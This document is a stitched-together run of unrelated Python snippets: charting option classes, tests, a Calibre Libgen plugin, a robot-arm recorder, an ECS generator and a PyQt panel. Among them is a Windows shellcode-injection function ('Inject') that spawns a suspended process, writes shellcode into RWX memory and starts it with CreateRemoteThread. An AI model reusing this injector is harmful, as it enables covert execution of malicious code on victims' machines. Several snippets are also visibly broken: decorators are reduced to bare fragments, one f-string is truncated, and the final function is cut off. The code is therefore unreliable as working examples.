return self.get('d3-ease')
def dsv(self) -> ImportModule:
return self.get('d3-dsv')
def dispatch(self) -> ImportModule:
return self.get('d3-dispatch')
def transition(self) -> ImportModule:
return self.get('d3-transition')
def selection(self) -> ImportModule:
return self.get('d3-selection')
def interpolate(self) -> ImportModule:
return self.get('d3-interpolate')
def time_format(self) -> ImportModule:
return self.get('d3-time-format')
def time(self) -> ImportModule:
return self.get('d3-time')
def array(self) -> ImportModule:
return self.get('d3-array')
def format(self) -> ImportModule:
return self.get('d3-format')
def timer(self) -> ImportModule:
return self.get('d3-timer')
def collection(self) -> ImportModule:
return self.get('d3-collection')
def scale(self) -> ImportModule:
return self.get('d3-scale')
def color(self) -> ImportModule:
return self.get('d3-color')
def brush(self) -> ImportModule:
return self.get('d3-brush')
def drag(self) -> ImportModule:
return self.get('d3-drag')
def shape(self) -> ImportModule:
return self.get('d3-shape')
def zoom(self) -> ImportModule:
return self.get('d3-zoom')
def path(self) -> ImportModule:
return self.get('d3-path') |
class DistinguisherMixin(abc.ABC):
def update(self, traces, data):
if (not isinstance(traces, _np.ndarray)):
raise TypeError(f'traces must be numpy ndarray, not {type(traces)}.')
if (not isinstance(data, _np.ndarray)):
raise TypeError(f'data must be numpy ndarray, not {type(data)}.')
if (traces.shape[0] != data.shape[0]):
raise ValueError(f'traces and data must have the same first dimension, not {traces.shape[0]} for traces and {data.shape[0]} for data.')
logger.info(f'Start update of distinguisher {self.__class__.__name__} with traces {traces.shape} and data {data.shape}.')
o_shape = data.shape
data = data.reshape((o_shape[0], (- 1)))
try:
self._origin_shape
except AttributeError:
logger.debug('Initialize distinguisher state.')
self._origin_shape = o_shape
logger.debug(f'Origin shape {self._origin_shape}')
mem = (psutil.virtual_memory().available / (2 ** 30))
logger.debug(f'Memory usage before compute {mem} GB.')
self._initialize(traces=traces, data=data)
self._check(traces=traces, data=data)
self.processed_traces += traces.shape[0]
logger.info('Will call _update traces.')
self._update(traces=traces, data=data)
def _initialize(self, traces, data):
pass
def _update(self, traces, data):
pass
def compute(self):
mem = (psutil.virtual_memory().available / (2 ** 30))
logger.debug(f'Memory usage before compute {mem} GB.')
try:
assert (self.processed_traces > 0)
except (AttributeError, AssertionError):
raise DistinguisherError('Distinguisher has not been initialized, or no traces have been processed. Please initialize and update the distinguisher before trying to use compute function.')
if (len(self._origin_shape) > 2):
return self._compute().reshape((self._origin_shape[1:] + ((- 1),)))
return self._compute()
def _compute(self):
pass
def _check(self, traces, data):
if (not self._is_checked):
data_dim = data.shape[1]
dtype_size = _np.dtype(self.precision).itemsize
needed_mem = (((dtype_size * data_dim) * self._memory_usage_coefficient(trace_size=traces.shape[1])) / (2 ** 30))
available_mem = (psutil.virtual_memory().available / (2 ** 30))
logger.debug(f'Needed memory estimated to {needed_mem} GB, for available {available_mem}.')
self._is_checked = True
if (needed_mem > (0.9 * available_mem)):
raise DistinguisherError(f'This analysis will probably need more than 90% of your available memory - {available_mem} GB available against {needed_mem} GB needed.')
def _memory_usage_coefficient(self, trace_size):
return (2 * trace_size)
def _distinguisher_str(self):
pass
def _set_precision(self, precision):
try:
precision = _np.dtype(precision)
except TypeError:
raise TypeError(f'precision should be a valid dtype, not {precision}.')
if (precision.kind != 'f'):
raise ValueError(f'precision should be a float dtype, not {precision.kind}.')
self.precision = precision |
class EditableValue(AbstractValueType):
is_editable = Bool(True, update_value_type=True)
def is_valid(self, model, row, column, value):
return True
def has_editor_value(self, model, row, column):
return (model.can_set_value(row, column) and self.is_editable)
def set_editor_value(self, model, row, column, value):
if self.is_valid(model, row, column, value):
model.set_value(row, column, value)
else:
raise DataViewSetError('Invalid value set: {!r}'.format(value)) |
class OptionPlotoptionsAreaSonificationContexttracksMappingHighpassFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class LibgenStore(StorePlugin):
def genesis(self):
debug_print = partial(module_debug_print, 'LibgenStore:genesis:')
debug_print('start')
self.libgen = LibgenFictionClient()
def search(self, query, max_results=10, timeout=60):
if (not hasattr(self, 'libgen')):
self.genesis()
debug_print = partial(module_debug_print, 'LibgenStore:search:')
debug_print('search:query = ', query)
libgen_results = self.libgen.search(query)
for result in libgen_results.results[:min(max_results, len(libgen_results.results))]:
debug_print('result.title = ', result.title)
for mirror in result.mirrors[0:1]:
debug_print('result.mirror.url = ', mirror.url)
s = SearchResult()
s.store_name = PLUGIN_NAME
s.cover_url = result.image_url
s.title = '{} ({}, {}{})'.format(result.title, result.language, mirror.size, mirror.unit)
s.author = result.authors
s.price = 'FREE'
s.detail_item = result.md5
s.drm = SearchResult.DRM_UNLOCKED
s.formats = mirror.format
s.plugin_author = PLUGIN_AUTHORS
debug_print('s = ', s)
(yield s)
def open(self, parent=None, detail_item=None, external=False):
debug_print = partial(module_debug_print, 'LibgenStore:open:')
debug_print('locals() = ', locals())
if (not hasattr(self, 'libgen')):
self.genesis()
detail_url = (self.libgen.get_detail_url(detail_item) if detail_item else self.libgen.base_url)
debug_print('detail_url = ', detail_url)
if (external or self.config.get('open_external', False)):
open_url(QUrl(detail_url))
else:
d = WebStoreDialog(self.gui, self.libgen.base_url, parent, detail_url)
d.setWindowTitle(self.name)
d.set_tags(self.config.get('tags', ''))
d.exec_()
def get_details(self, search_result, details):
url = self.libgen.get_detail_url(search_result.detail_item)
download = self.libgen.get_download_url(search_result.detail_item)
search_result.downloads[search_result.formats] = download |
.django_db(transaction=True)
def test_download_transactions_bad_column_list_raises(client, monkeypatch, download_test_data, elasticsearch_transaction_index):
setup_elasticsearch_test(monkeypatch, elasticsearch_transaction_index)
download_generation.retrieve_db_string = Mock(return_value=get_database_dsn_string(settings.DOWNLOAD_DB_ALIAS))
payload = {'filters': {'award_type_codes': ['A']}, 'columns': ['modification_number', 'bogus_column']}
resp = client.post('/api/v2/download/transactions/', content_type='application/json', data=json.dumps(payload))
assert (resp.status_code == status.HTTP_400_BAD_REQUEST)
assert ('Unknown columns' in resp.json()['detail'])
assert ('bogus_column' in resp.json()['detail'])
assert ('modification_number' not in resp.json()['detail']) |
class TracingTestShortTraceId(AmbassadorTest):
def init(self):
self.target = HTTP()
self.zipkin = Zipkin()
def config(self) -> Generator[(Union[(str, Tuple[(Node, str)])], None, None)]:
(yield (self.target, self.format('\n---\napiVersion: getambassador.io/v3alpha1\nkind: Mapping\nname: tracing_target_mapping_64\nhostname: "*"\nprefix: /target-64/\nservice: {self.target.path.fqdn}\n')))
(yield (self, self.format('\n---\napiVersion: getambassador.io/v3alpha1\nkind: TracingService\nname: tracing-64\nservice: {self.zipkin.path.fqdn}:9411\ndriver: zipkin\nconfig:\n trace_id_128bit: false\n')))
def queries(self):
(yield Query(self.url('target-64/'), phase=1))
(yield Query(f' phase=check_phase))
(yield Query(self.url('ambassador/v0/diag/'), phase=check_phase))
def check(self):
trace = self.results[1].json[0][0]
traceId = trace['traceId']
assert (len(traceId) == 16) |
def CreateBmmRCRPermOperator(manifest):
operation_kind = library.GemmKind.BatchGemmPermute
a_element_desc = library.TensorDesc(library.DataType.f16, library.LayoutType.RowMajor)
b_element_desc = library.TensorDesc(library.DataType.f16, library.LayoutType.ColumnMajor)
c_element_desc = library.TensorDesc(library.DataType.f16, library.LayoutType.RowMajor)
element_op = library.TensorOperation.PassThrough
tile_descriptions = [gemm.TileDesc(256, 256, 128, 32, 8, 8, 32, 32, 4, 2), gemm.TileDesc(256, 128, 256, 32, 8, 8, 32, 32, 2, 4), gemm.TileDesc(256, 128, 128, 32, 8, 8, 32, 32, 2, 2), gemm.TileDesc(256, 128, 64, 32, 8, 8, 32, 32, 2, 1), gemm.TileDesc(256, 64, 128, 32, 8, 8, 32, 32, 1, 2), gemm.TileDesc(128, 128, 128, 32, 8, 8, 32, 32, 4, 2), gemm.TileDesc(128, 128, 64, 32, 8, 8, 32, 32, 2, 2), gemm.TileDesc(128, 64, 128, 32, 8, 8, 32, 32, 2, 2), gemm.TileDesc(64, 64, 64, 32, 8, 8, 32, 32, 2, 2), gemm.TileDesc(128, 128, 32, 32, 8, 8, 32, 32, 2, 1), gemm.TileDesc(128, 32, 128, 32, 8, 8, 32, 32, 1, 2), gemm.TileDesc(64, 64, 32, 32, 8, 8, 32, 32, 2, 1), gemm.TileDesc(64, 32, 64, 32, 8, 8, 32, 32, 1, 2)]
block_descriptions = []
c_block_descriptions = []
for t in tile_descriptions:
block_transfer = (- 1)
c_block_transfer = (- 1)
if (t.block_size == 256):
block_transfer = [4, 64, 1]
c_block_transfer = gemm.CBlockTransferDesc(1, 1, [1, 32, 1, 8], 8)
if (t.block_size == 128):
block_transfer = [4, 32, 1]
if (t.n_per_block == 128):
c_block_transfer = gemm.CBlockTransferDesc(1, 1, [1, 16, 1, 8], 8)
else:
c_block_transfer = gemm.CBlockTransferDesc(1, 1, [1, 32, 1, 4], 8)
if (t.block_size == 64):
block_transfer = [4, 16, 1]
c_block_transfer = gemm.CBlockTransferDesc(1, 1, [1, 16, 1, 4], 8)
assert ((block_transfer != (- 1)) and (c_block_transfer != (- 1)) and ('Cannot determine block_transfer_size with block_size ' + str(t.block_size)))
block_descriptions.append(gemm.BlockTransferDesc(block_transfer, [1, 0, 2], [1, 0, 2], 2, 8, 8, 1))
c_block_descriptions.append(c_block_transfer)
gemm_specialization = [gemm.GemmSpecialization.GemmDefault, gemm.GemmSpecialization.MNKPadding]
operations = []
for gemm_spec in gemm_specialization:
for (tile_desc, block_desc, c_block_desc) in zip(tile_descriptions, block_descriptions, c_block_descriptions):
new_operation = gemm.GemmOperation(operation_kind=operation_kind, extra_kind=element_op, xdl_op_type=gemm.XdlOpType.DeviceBatchedGemmCPermuteXdl, A=a_element_desc, B=b_element_desc, C=c_element_desc, a_elem_op=element_op, b_elem_op=element_op, epilogue_functor=element_op, gemm_specialization=gemm_spec, tile_desc=tile_desc, a_block_transfer=block_desc, b_block_transfer=block_desc, c_block_transfer=c_block_desc)
manifest.append(new_operation)
operations.append(new_operation)
return operations |
class TeachingTest(Helper):
def __init__(self, mycobot) -> None:
super().__init__()
self.mb = mb
self.recording = False
self.playing = False
self.record_list = []
self.record_t = None
self.play_t = None
def record(self):
self.record_list = []
self.recording = True
def _record():
start_t = time.time()
_id = 0
while self.recording:
_encoders = self.mb.get_encoders(_id)
if _encoders:
if _encoders[(- 2):(- 1)]:
self.record_list.append(_encoders)
time.sleep(0.05)
self.echo('Start recording.')
self.record_t = threading.Thread(target=_record, daemon=True)
self.record_t.start()
def stop_record(self):
if self.recording:
self.recording = False
self.record_t.join()
self.echo('Stop record')
def play(self):
self.echo('Start play')
for _encoders_data in self.record_list:
print(_encoders_data)
_encoders = ((_encoders_data[0:7] + _encoders_data[14:21]) + _encoders_data[(- 2):(- 1)])
_speeds = ((_encoders_data[7:14] + _encoders_data[21:28]) + _encoders_data[(- 1):])
self.mb.set_encoders(0, _encoders, _speeds)
time.sleep(0.05)
self.echo('Finish play')
def loop_play(self):
self.playing = True
def _loop():
len_ = len(self.record_list)
i = 0
while self.playing:
idx_ = (i % len_)
i += 1
_encoders_data = self.record_list[idx_]
print(_encoders_data)
_encoders = ((_encoders_data[0:7] + _encoders_data[14:21]) + _encoders_data[(- 2):(- 1)])
_speeds = ((_encoders_data[7:14] + _encoders_data[21:28]) + _encoders_data[(- 1):])
self.mb.set_encoders(0, _encoders, _speeds)
time.sleep(0.05)
self.echo('Start loop play.')
self.play_t = threading.Thread(target=_loop, daemon=True)
self.play_t.start()
def stop_loop_play(self):
if self.playing:
self.playing = False
self.play_t.join()
self.echo('Stop loop play.')
def save_to_local(self):
if (not self.record_list):
self.echo('No data should save.')
return
with open((os.path.dirname(__file__) + '/record.txt'), 'w') as f:
json.dump(self.record_list, f, indent=2)
self.echo('save dir: {}'.format(os.path.dirname(__file__)))
def load_from_local(self):
with open((os.path.dirname(__file__) + '/record.txt'), 'r') as f:
try:
data = json.load(f)
self.record_list = data
self.echo('Load data success.')
except Exception:
self.echo('Error: invalid data.')
def print_menu(self):
print(' \r q + Enter: quit\n \r r + Enter: start record\n \r c + Enter: stop record\n \r p + Enter: play once\n \r P + Enter: loop play / stop loop play\n \r s + Enter: save to local\n \r l + Enter: load from local\n \r f + Enter: release mycobot\n \r\n ')
def start(self):
global WIN, LINUX
self.print_menu()
while (not False):
if WIN:
key = input()
elif LINUX:
with Raw(sys.stdin):
key = sys.stdin.read(1)
if (key == 'q'):
break
elif (key == 'r'):
self.record()
elif (key == 'c'):
self.stop_record()
elif (key == 'p'):
self.play()
elif (key == 'P'):
if (not self.playing):
self.loop_play()
else:
self.stop_loop_play()
elif (key == 's'):
self.save_to_local()
elif (key == 'l'):
self.load_from_local()
elif (key == 'f'):
self.mb.release_all_servos(0)
time.sleep(0.05)
self.mb.release_all_servos(2)
self.echo('Released')
else:
print(key)
continue |
def main() -> None:
args = argument_parser()
ecs_generated_version: str = read_version(args.ref)
print(('Running generator. ECS version ' + ecs_generated_version))
out_dir = 'generated'
docs_dir = 'docs'
if args.out:
default_dirs = False
out_dir = os.path.join(args.out, out_dir)
docs_dir = os.path.join(args.out, docs_dir)
else:
default_dirs = True
ecs_helpers.make_dirs(out_dir)
if (args.include and (loader.EXPERIMENTAL_SCHEMA_DIR in args.include)):
ecs_generated_version += '+exp'
print(('Experimental ECS version ' + ecs_generated_version))
fields: dict[(str, FieldEntry)] = loader.load_schemas(ref=args.ref, included_files=args.include)
cleaner.clean(fields, strict=args.strict)
finalizer.finalize(fields)
(fields, docs_only_fields) = subset_filter.filter(fields, args.subset, out_dir)
fields = exclude_filter.exclude(fields, args.exclude)
(nested, flat) = intermediate_files.generate(fields, os.path.join(out_dir, 'ecs'), default_dirs)
if args.intermediate_only:
exit()
csv_generator.generate(flat, ecs_generated_version, out_dir)
es_template.generate(nested, ecs_generated_version, out_dir, args.mapping_settings, args.template_settings)
es_template.generate_legacy(flat, ecs_generated_version, out_dir, args.mapping_settings, args.template_settings_legacy)
beats.generate(nested, ecs_generated_version, out_dir)
if ((args.include or args.subset or args.exclude) and (not args.force_docs)):
exit()
ecs_helpers.make_dirs(docs_dir)
docs_only_nested = intermediate_files.generate_nested_fields(docs_only_fields)
asciidoc_fields.generate(nested, docs_only_nested, ecs_generated_version, docs_dir) |
def compare_versions(vA, vB):
((releaseA, tagA, tagnumA), (releaseB, tagB, tagnumB)) = [parse_version(v) for v in [vA, vB]]
if (releaseA != releaseB):
return (1 if (releaseA > releaseB) else (- 1))
elif (tagA is None):
if (tagB is None):
return 0
elif (tagB < 'final'):
return 1
else:
return (- 1)
elif (tagB is None):
if (tagA < 'final'):
return (- 1)
else:
return 1
elif (tagA != tagB):
return (1 if (tagA > tagB) else (- 1))
elif (tagnumA > tagnumB):
return 1
elif (tagnumA == tagnumB):
return 0
else:
return (- 1) |
('ciftify.config.verify_msm_available')
('ciftify.bidsapp.fmriprep_ciftify.run')
def test_ux07_default_one_subject_one_session_for_synth(mock_run, mock_vmsm):
uargs = [synth_bids, '/output/dir', 'participant', '--participant_label=02', '--session_label=01']
ret = simple_main_run(uargs)
call_list = parse_call_list_into_strings(mock_run.call_args_list)
assert (count_calls_to('fmriprep', call_list, call_contains='--anat_only') == 0)
assert (count_calls_to('fmriprep', call_list, call_contains='--use-syn-sdc') == 6)
assert (count_calls_to('ciftify_recon_all', call_list) == 1) |
class _EnsembleStateTracker():
def __init__(self, state_: str=state.ENSEMBLE_STATE_UNKNOWN) -> None:
self._state = state_
self._handles: Dict[(str, _handle)] = {}
self._msg = 'Illegal state transition from %s to %s'
self.set_default_handles()
def add_handle(self, state_: str, handle: _handle) -> None:
self._handles[state_] = handle
def _handle_unknown(self) -> None:
if (self._state != state.ENSEMBLE_STATE_UNKNOWN):
logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_UNKNOWN)
self._state = state.ENSEMBLE_STATE_UNKNOWN
def _handle_started(self) -> None:
if (self._state != state.ENSEMBLE_STATE_UNKNOWN):
logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_STARTED)
self._state = state.ENSEMBLE_STATE_STARTED
def _handle_failed(self) -> None:
if (self._state not in [state.ENSEMBLE_STATE_UNKNOWN, state.ENSEMBLE_STATE_STARTED]):
logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_FAILED)
self._state = state.ENSEMBLE_STATE_FAILED
def _handle_stopped(self) -> None:
if (self._state != state.ENSEMBLE_STATE_STARTED):
logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_STOPPED)
self._state = state.ENSEMBLE_STATE_STOPPED
def _handle_canceled(self) -> None:
if (self._state != state.ENSEMBLE_STATE_STARTED):
logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_CANCELLED)
self._state = state.ENSEMBLE_STATE_CANCELLED
def set_default_handles(self) -> None:
self.add_handle(state.ENSEMBLE_STATE_UNKNOWN, self._handle_unknown)
self.add_handle(state.ENSEMBLE_STATE_STARTED, self._handle_started)
self.add_handle(state.ENSEMBLE_STATE_FAILED, self._handle_failed)
self.add_handle(state.ENSEMBLE_STATE_STOPPED, self._handle_stopped)
self.add_handle(state.ENSEMBLE_STATE_CANCELLED, self._handle_canceled)
def update_state(self, state_: str) -> str:
if (state_ not in self._handles):
raise KeyError(f'Handle not defined for state {state_}')
self._handles[state_]()
return self._state |
def test_contract_deployment_with_constructor_with_address_argument(w3, contract_with_constructor_address_factory):
deploy_txn = contract_with_constructor_address_factory.constructor('0x16D9983245De15E7A9A73bC586E01FF6E08dE737').transact()
txn_receipt = w3.eth.wait_for_transaction_receipt(deploy_txn)
assert (txn_receipt is not None)
assert txn_receipt['contractAddress']
contract_address = txn_receipt['contractAddress']
blockchain_code = w3.eth.get_code(contract_address)
assert (blockchain_code == decode_hex(CONSTRUCTOR_WITH_ADDRESS_ARGUMENT_CONTRACT_RUNTIME)) |
def validate(data=None, schema_id=None, filepath=None, root=None, definition=None, specs=None, validation_function=None, validation_error_handler=None, require_data=True, openapi_version=None):
schema_id = (schema_id or definition)
if ((filepath is None) and (specs is None)):
abort(Response('Filepath or specs is needed to validate', status=500))
if (data is None):
data = request.json
elif callable(data):
data = data()
if ((not data) and require_data):
abort(Response('No data to validate', status=400))
endpoint = request.endpoint.lower().replace('.', '_')
verb = request.method.lower()
if (filepath is not None):
if (not root):
try:
frame_info = inspect.stack()[1]
root = os.path.dirname(os.path.abspath(frame_info[1]))
except Exception:
root = None
else:
root = os.path.dirname(root)
if (not filepath.startswith('/')):
final_filepath = os.path.join(root, filepath)
else:
final_filepath = filepath
full_doc = load_from_file(final_filepath)
yaml_start = full_doc.find('---')
swag = yaml.safe_load(full_doc[(yaml_start if (yaml_start >= 0) else 0):])
else:
swag = copy.deepcopy(specs)
params = [item for item in swag.get('parameters', []) if item.get('schema')]
definitions = {}
main_def = {}
raw_definitions = extract_definitions(params, endpoint=endpoint, verb=verb, openapi_version=openapi_version)
if (schema_id is None):
for param in params:
if (param.get('in') == 'body'):
schema_id = param.get('schema', {}).get('$ref')
if schema_id:
schema_id = schema_id.split('/')[(- 1)]
break
if (schema_id is None):
if raw_definitions:
schema_id = raw_definitions[0].get('id')
for defi in raw_definitions:
if (defi['id'].lower() == schema_id.lower()):
main_def = defi.copy()
else:
definitions[defi['id']] = defi
if (schema_id in extract_schema(swag)):
main_def = extract_schema(swag).get(schema_id)
main_def['definitions'] = definitions
for (key, value) in definitions.items():
if ('id' in value):
del value['id']
if (validation_function is None):
validation_function = jsonschema.validate
absolute_path = os.path.dirname(sys.argv[0])
if (filepath is None):
relative_path = absolute_path
else:
relative_path = os.path.dirname(filepath)
main_def = __replace_ref(main_def, relative_path, swag)
try:
validation_function(data, main_def)
except Exception as err:
if (validation_error_handler is not None):
validation_error_handler(err, data, main_def)
else:
abort(Response(str(err), status=400)) |
.parametrize('elasticapm_client', [{'include_paths': ('tests',), 'local_var_max_length': 20, 'local_var_list_max_length': 10}], indirect=True)
def test_exception_event(elasticapm_client):
try:
a_local_var = 1
a_long_local_var = (100 * 'a')
a_long_local_list = list(range(100))
raise ValueError('foo')
except ValueError:
elasticapm_client.capture('Exception')
assert (len(elasticapm_client.events) == 1)
event = elasticapm_client.events[ERROR][0]
assert ('exception' in event)
exc = event['exception']
assert (exc['message'] == 'ValueError: foo')
assert (exc['type'] == 'ValueError')
assert (exc['module'] == ValueError.__module__)
assert ('stacktrace' in exc)
frames = exc['stacktrace']
assert (len(frames) == 1)
frame = frames[0]
assert frame['abs_path'], __file__.replace(('.pyc' == '.py'))
assert (frame['filename'] == os.path.join('tests', 'client', 'exception_tests.py'))
assert (frame['module'] == __name__)
assert (frame['function'] == 'test_exception_event')
assert (not frame['library_frame'])
assert (frame['vars']['a_local_var'] == 1)
assert (len(frame['vars']['a_long_local_var']) == 20)
assert (len(frame['vars']['a_long_local_list']) == 12)
assert (frame['vars']['a_long_local_list'][(- 1)] == '(90 more elements)')
assert ('timestamp' in event)
assert ('log' not in event)
assert all(((frame['library_frame'] or frame['module'].startswith('tests')) for frame in event['exception']['stacktrace'])) |
def extractVouriatransBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('ibtmlff', "I Became The Male Lead's Female Friend.", 'translated'), ('irvp', 'I Raised the Villains Preciously', 'translated'), ('tinpff', 'There is No Place For Fakes', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_queue_info(tmp_path, capsys):
args = helpers.setup_temp_env(tmp_path)
reqid = 'req-compile-bench--nobody-mac'
queue_file = ((((tmp_path / 'BENCH') / 'QUEUES') / 'mac') / 'queue.json')
queue_file.write_text(json.dumps({'jobs': [reqid], 'paused': False}))
__main__._parse_and_main([*args, 'queue', 'info'], __file__)
content = json.loads(queue_file.read_text())
assert (content['jobs'] == [reqid])
captured = capsys.readouterr()
assert re.match(textwrap.dedent('\n Job Queue \\(linux\\):\n size: 0\n paused: False\n lock: \\(not locked\\)\n\n Files:\n data: .*?/BENCH/QUEUES/linux/queue.json\n lock: \\(.*?/BENCH/QUEUES/linux/queue.lock\\)\n log: \\(.*?/BENCH/QUEUES/linux/queue.log\\)\n\n Top 5:\n \\(queue is empty\\)\n\n Log size: 0\n Last log entry:\n \\(log is empty\\)\n\n Job Queue \\(mac\\):\n size: 1\n paused: False\n lock: \\(not locked\\)\n\n Files:\n data: .*?/BENCH/QUEUES/mac/queue.json\n lock: \\(.*?/BENCH/QUEUES/mac/queue.lock\\)\n log: \\(.*?/BENCH/QUEUES/mac/queue.log\\)\n\n Top 5:\n 1 req-compile-bench--nobody-mac\n\n Log size: 0\n Last log entry:\n \\(log is empty\\)\n ').strip(), captured.out.strip()) |
def fortios_firewall(data, fos):
fos.do_member_operation('firewall', 'access-proxy-virtual-host')
if data['firewall_access_proxy_virtual_host']:
resp = firewall_access_proxy_virtual_host(data, fos)
else:
fos._module.fail_json(msg=('missing task body: %s' % 'firewall_access_proxy_virtual_host'))
return ((not is_successful_status(resp)), (is_successful_status(resp) and (resp['revision_changed'] if ('revision_changed' in resp) else True)), resp, {}) |
('subprocess.check_call')
def test_run_check_command_fail(mock_check_call):
mock_check_call.side_effect = check_call_side_effect
cmd_parameters = cmd_exec.CommandParameters(cwd='/tmp')
cmd = 'command_error'
output = ''
with pytest.raises(subprocess.CalledProcessError) as process_error:
output = cmd_exec.run_check_command(cmd, cmd_parameters)
assert (not output)
assert (f"Command '{cmd}' returned non-zero exit status" in str(process_error.value)) |
_os('windows')
def Inject(path, shellcode):
import ctypes, time
import ctypes.wintypes
from ctypes.wintypes import BOOL
from ctypes.wintypes import DWORD
from ctypes.wintypes import HANDLE
from ctypes.wintypes import LPVOID
from ctypes.wintypes import LPCVOID
import win32process
info = win32process.CreateProcess(None, path, None, None, False, 4, None, None, win32process.STARTUPINFO())
page_rwx_value = 64
process_all = 2035711
memcommit = 4096
if (info[0].handle > 0):
print(f'[+] - Created {path} Suspended')
shellcode_length = len(shellcode)
process_handle = info[0].handle
VirtualAllocEx = windll.kernel32.VirtualAllocEx
VirtualAllocEx.restype = LPVOID
VirtualAllocEx.argtypes = (HANDLE, LPVOID, DWORD, DWORD, DWORD)
WriteProcessMemory = ctypes.windll.kernel32.WriteProcessMemory
WriteProcessMemory.restype = BOOL
WriteProcessMemory.argtypes = (HANDLE, LPVOID, LPCVOID, DWORD, DWORD)
CreateRemoteThread = ctypes.windll.kernel32.CreateRemoteThread
CreateRemoteThread.restype = HANDLE
CreateRemoteThread.argtypes = (HANDLE, LPSECURITY_ATTRIBUTES, DWORD, LPTHREAD_START_ROUTINE, LPVOID, DWORD, DWORD)
lpBuffer = VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
print(f'[+] - Allocated remote memory at {hex(lpBuffer)}')
res = WriteProcessMemory(process_handle, lpBuffer, shellcode, shellcode_length, 0)
if (res > 0):
print('[+] - Shellcode written.')
CreateRemoteThread(process_handle, None, 0, lpBuffer, 0, 0, 0)
print('[+] - Shellcode Injection, done.') |
def extractTintinWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if (item['tags'] == ['Uncategorized']):
titlemap = [('The Legend of Divine Mystics- Chapter ', 'The Legend of Divine Mystics', 'translated'), ('Tensei Shoujo no Rirekisho', 'Tensei Shoujo no Rirekisho', 'translated'), ('Master of Dungeon', 'Master of Dungeon', 'oel')]
for (titlecomponent, name, tl_type) in titlemap:
if (titlecomponent.lower() in item['title'].lower()):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class OptionSeriesLollipopSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class Window(QWidget):
def __init__(self):
super(Window, self).__init__()
self.setGeometry(winx, winy, winwidth, winheight)
self.setStyleSheet('background-color:black;')
self.setWindowTitle(patch.getstring('display', 'title', default='EEGsynth inputcontrol'))
self.drawmain()
def drawpanel(self, panel, list):
for item in list:
try:
key = ('%s.%s' % (prefix, item[0]))
val = patch.redis.get(key)
try:
val = float(val)
if ((item[1] == 'slider') or (item[1] == 'dial')):
val = EEGsynth.rescale(val, slope=output_scale, offset=output_offset, reverse=True)
elif ((item[1] == 'slap') or (item[1] == 'push')):
val = 0
elif (item[1] == 'toggle1'):
val = int(((1.0 * val) / 127.0))
elif (item[1] == 'toggle2'):
val = int(((2.0 * val) / 127.0))
elif (item[1] == 'toggle3'):
val = int(((3.0 * val) / 127.0))
elif (item[1] == 'toggle4'):
val = int(((4.0 * val) / 127.0))
elif (item[1] == 'text'):
val = EEGsynth.rescale(val, slope=output_scale, offset=output_offset)
monitor.info(('%s = %g' % (key, val)))
except ValueError:
val = val
monitor.info(('%s = %s' % (key, val)))
except:
val = 0
if (item[1] == 'label'):
l = QtWidgets.QLabel(item[0])
l.setAlignment(QtCore.Qt.AlignHCenter)
l.setStyleSheet('color: rgb(200,200,200);')
panel.addWidget(l)
elif (item[1] == 'placeholder'):
l = QtWidgets.QLabel('')
panel.addWidget(l)
elif (item[1] == 'text'):
t = QLineEditDrop()
t.name = item[0]
t.type = item[1]
if isinstance(val, str):
t.setText(val)
else:
t.setText(('%g' % val))
t.setAlignment(QtCore.Qt.AlignHCenter)
t.setStyleSheet('background-color: rgb(64,64,64); color: rgb(200,200,200);')
t.editingFinished.connect(self.changevalue)
t.textChanged.connect(self.changevalue)
l = QtWidgets.QLabel(t.name)
l.setAlignment(QtCore.Qt.AlignHCenter)
l.setStyleSheet('color: rgb(200,200,200);')
tl = QtWidgets.QVBoxLayout()
tl.addWidget(t)
tl.setAlignment(t, QtCore.Qt.AlignHCenter)
tl.addWidget(l)
tl.setAlignment(l, QtCore.Qt.AlignHCenter)
panel.addLayout(tl)
elif (item[1] == 'slider'):
s = QtWidgets.QSlider(QtCore.Qt.Vertical)
s.name = item[0]
s.type = item[1]
s.setMinimum(0)
s.setMaximum(127)
s.setValue(int(val))
s.setTickInterval(1)
s.setTickPosition(QtWidgets.QSlider.NoTicks)
s.setStyleSheet('background-color: rgb(64,64,64);')
s.valueChanged.connect(self.changevalue)
l = QtWidgets.QLabel(s.name)
l.setAlignment(QtCore.Qt.AlignHCenter)
l.setStyleSheet('color: rgb(200,200,200);')
sl = QtWidgets.QVBoxLayout()
sl.addWidget(s)
sl.setAlignment(s, QtCore.Qt.AlignHCenter)
sl.addWidget(l)
sl.setAlignment(l, QtCore.Qt.AlignHCenter)
panel.addLayout(sl)
elif (item[1] == 'dial'):
s = QtWidgets.QDial()
